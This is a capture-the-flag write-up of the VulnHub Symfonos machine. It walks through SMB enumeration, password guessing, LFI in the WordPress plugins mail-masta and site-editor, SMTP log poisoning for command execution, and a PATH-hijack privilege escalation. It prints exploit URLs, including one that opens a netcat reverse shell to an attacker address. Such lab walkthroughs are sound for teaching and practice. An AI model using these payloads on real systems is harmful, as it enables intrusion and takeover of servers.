Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 06:34:17 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/VulnHub/Symfonos.md
ARZ 46613cab96
Add files via upload
2021-05-20 20:24:47 +05:00

6.7 KiB
Raw Permalink Blame History

Vulnhub-Symfonos

Rustscan


22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:    
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (ED25519)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=symfonos              
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42       
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:41:21:96 (Oracle VirtualBox virtual NIC)
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

PROT 139/445 (SMB)

I ran smbmap to see on which shares I have read access as anonmyous user

So we only have read access to anomyousshare

We can see there a text so let's download it using GET

This looks like some potential passwords we can use when brute forcing we also have a username zeus

Let's run enum4linux-ng to enumerate for users

We only get one user helios

PORT 80 (HTTP)

On the web server we see this weird image

There's nothing in the source either , so I started to fuzz for files and directories using dirsearch

But found nothing , so brute forcing is the last resort this is what I'll be doing , we have a username so we could try to brute force against those 3 passwords , if that fails I'll move to rockyou.txt

It failed so let's try these 3 passwords on smb as helios

The first password failed but the second worked and we can access his share now

After reading todo.txt we get a hidden directory

So this is a wordpress site but the css isn't loaded , we can fix it by seeing where it's grabbing the css file from

We need to add a domain symfonos.local in /etc/hosts file

Now it looks better so let's enumerate the wordpress site for that I am going to use wpscan

We have a user admin so we could do brute forcing for his password

Also I'll run a scan for enumerating plugins being used on the wordpress site

We can see two plugins , mail-masta and site-editor, first I am going to search on mail-masta for any exploits

And it seems we found a LFI vulnerability exploit in mail-masta

Let's give it a try in reading /etc/passwd file through LFI

And boom we got LFI vulnerability here

The other plugin is also vulnerable to LFI

Now we know there that port 25 which is smtp is open so we could see if we could poision it's log files ,so visiting hacktricks I found that it's possible

http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios

We can read the logs so it's possbile, I followed this article in order to do smtp log poisioning

https://liberty-shell.com/sec/2018/05/19/poisoning/

The sender's mail is just I saw from the logs so I putted there but that important thing to note here is the subject we are putting which is the GET paramtere being executed as shell command. Now if add a paramter along the path of log file

http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&pwn=id

So let's just get a shell with netcat

http://symfonos.local/h3l105/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/helios&hello=nc 192.168.1.2 2222 -e /bin/bash

Now we check if we have permissions to run any command as sudo with sudo -l

No sudo : \

Let's check for any SUID binaries

We found /opt/statuscheck. On running the binary it results to making a request

Let's further analyze the binary if strings is installed on the machine

It is available so we can see what the binary is doing

The binary is using a command curl http://localhost so we can exploit PATH variable here by making a fake curl binary include bash there and including that binary in the PATH variable

However if we run it , we won't get a root shell

I then tried to make bash a SUID

It gave me an error, so I was not sure why this wasn't working, so I then just removed the shebang line

Ran it again

And boom we have made bash a SUID